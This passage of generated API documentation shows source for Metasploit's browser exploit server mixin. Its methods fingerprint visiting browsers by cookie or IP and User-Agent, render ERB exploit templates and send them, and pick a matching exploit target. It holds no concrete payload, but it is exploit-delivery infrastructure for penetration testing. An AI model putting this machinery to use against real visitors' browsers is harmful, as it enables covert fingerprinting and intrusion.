<span class='symbol'>:ua_name</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_found_ua_name'>found_ua_name</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='comma'>,</span>
<span class='symbol'>:ua_ver</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_found_ua_ver'>found_ua_ver</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="retrieve_tag-instance_method">
#<strong>retrieve_tag</strong>(cli, request) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Retrieves a tag. First it obtains the tag from the browsers “Cookie” header. If the header is empty (possible if the browser has cookies disabled), then it will return a tag based on IP + the user-agent.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>request</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Proto/Http/Request.html" title="Rex::Proto::Http::Request (class)">Rex::Proto::Http::Request</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The HTTP request sent by the browser</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 268</span>
<span class='kw'>def</span> <span class='id identifier rubyid_retrieve_tag'>retrieve_tag</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cookie'>cookie</span> <span class='op'>=</span> <span class='const'>CGI</span><span class='op'>::</span><span class='const'>Cookie</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Cookie</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='id identifier rubyid_tag'>tag</span> <span class='op'>=</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_has_key?'>has_key?</span><span class='lparen'>(</span><span class='id identifier rubyid_cookie_name'>cookie_name</span><span class='rparen'>)</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='lbracket'>[</span><span class='id identifier rubyid_cookie_name'>cookie_name</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span>
<span class='kw'>if</span> <span class='id identifier rubyid_tag'>tag</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='comment'># Browser probably doesn&#39;t allow cookies, plan B :-/
</span> <span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>No cookie received for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>, resorting to headers hash.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_ip'>ip</span> <span class='op'>=</span> <span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span>
<span class='id identifier rubyid_os'>os</span> <span class='op'>=</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>User-Agent</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_tag'>tag</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_md5'>md5</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_os'>os</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Received cookie &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tag'>tag</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tag'>tag</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="send_exploit_html-instance_method">
#<strong>send_exploit_html</strong>(cli, template, headers = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Converts an ERB-based exploit template into HTML, and sends to client</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cli</span>
<span class='type'>(<tt>Socket</tt>)</span>
&mdash;
<div class='inline'>
<p>Socket for the browser</p>
</div>
</li>
<li>
<span class='name'>template</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The ERB template. If you want to pass the binding object, then this is handled as an Array, with the first element being the HTML, and the second element is the binding object.</p>
</div>
</li>
<li>
<span class='name'>headers</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>The custom HTTP headers to include in the response</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
644
645
646
647
648
649
650
651
652</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 644</span>
<span class='kw'>def</span> <span class='id identifier rubyid_send_exploit_html'>send_exploit_html</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_template'>template</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_html'>html</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>if</span> <span class='id identifier rubyid_template'>template</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span> <span class='op'>==</span> <span class='const'>Array</span>
<span class='id identifier rubyid_html'>html</span> <span class='op'>=</span> <span class='const'>ERB</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_template'>template</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_result'>result</span><span class='lparen'>(</span><span class='id identifier rubyid_template'>template</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_html'>html</span> <span class='op'>=</span> <span class='const'>ERB</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_template'>template</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_result'>result</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_html'>html</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="setup-instance_method">
#<strong>setup</strong> &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
106
107
108
109
110
111
112
113
114
115
116
117</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 106</span>
<span class='kw'>def</span> <span class='id identifier rubyid_setup'>setup</span>
<span class='id identifier rubyid_custom_404'>custom_404</span> <span class='op'>=</span> <span class='id identifier rubyid_get_custom_404_url'>get_custom_404_url</span>
<span class='kw'>if</span> <span class='op'>!</span><span class='id identifier rubyid_custom_404'>custom_404</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_custom_404'>custom_404</span> <span class='op'>!~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^http</span><span class='regexp_end'>/i</span></span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../OptionValidateError.html" title="Msf::OptionValidateError (class)">OptionValidateError</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptionValidateError.html#initialize-instance_method" title="Msf::OptionValidateError#initialize (method)">new</a></span></span><span class='lparen'>(</span>
<span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Custom404</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>must begin with http or https</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span>
<span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>super</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="try_set_target-instance_method">
#<strong>try_set_target</strong>(profile) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Sets the target automatically based on what requirements are met. If theres a possible matching target, it will also merge the requirements. You can use the get_target() method to retrieve the most current target.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>profile</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>The profile to check</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 188</span>
<span class='kw'>def</span> <span class='id identifier rubyid_try_set_target'>try_set_target</span><span class='lparen'>(</span><span class='id identifier rubyid_profile'>profile</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>unless</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_respond_to?'>respond_to?</span><span class='lparen'>(</span><span class='symbol'>:targets</span><span class='rparen'>)</span>
<span class='id identifier rubyid_match_counts'>match_counts</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_target_requirements'>target_requirements</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span>
<span class='id identifier rubyid_targets'>targets</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_t'>t</span><span class='op'>|</span>
<span class='id identifier rubyid_target_requirements'>target_requirements</span> <span class='op'>=</span> <span class='id identifier rubyid_extract_requirements'>extract_requirements</span><span class='lparen'>(</span><span class='id identifier rubyid_t'>t</span><span class='period'>.</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_target_requirements'>target_requirements</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='id identifier rubyid_match_counts'>match_counts</span> <span class='op'>&lt;&lt;</span> <span class='int'>0</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_match_counts'>match_counts</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_target_requirements'>target_requirements</span><span class='period'>.</span><span class='id identifier rubyid_select'>select</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_k'>k</span><span class='comma'>,</span><span class='id identifier rubyid_v'>v</span><span class='op'>|</span>
<span class='kw'>if</span> <span class='id identifier rubyid_v'>v</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span> <span class='const'>Regexp</span>
<span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='rbracket'>]</span> <span class='op'>=~</span> <span class='id identifier rubyid_v'>v</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='id identifier rubyid_v'>v</span>
<span class='kw'>end</span>
<span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_match_counts'>match_counts</span><span class='period'>.</span><span class='id identifier rubyid_max'>max</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span> <span class='op'>&gt;</span> <span class='int'>0</span>
<span class='ivar'>@target</span> <span class='op'>=</span> <span class='id identifier rubyid_targets'>targets</span><span class='lbracket'>[</span><span class='id identifier rubyid_match_counts'>match_counts</span><span class='period'>.</span><span class='id identifier rubyid_index'>index</span><span class='lparen'>(</span><span class='id identifier rubyid_match_counts'>match_counts</span><span class='period'>.</span><span class='id identifier rubyid_max'>max</span><span class='rparen'>)</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_target_requirements'>target_requirements</span> <span class='op'>=</span> <span class='id identifier rubyid_extract_requirements'>extract_requirements</span><span class='lparen'>(</span><span class='ivar'>@target</span><span class='period'>.</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_target_requirements'>target_requirements</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='ivar'>@requirements</span> <span class='op'>=</span> <span class='ivar'>@requirements</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='id identifier rubyid_target_requirements'>target_requirements</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:35 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue Copy Permalink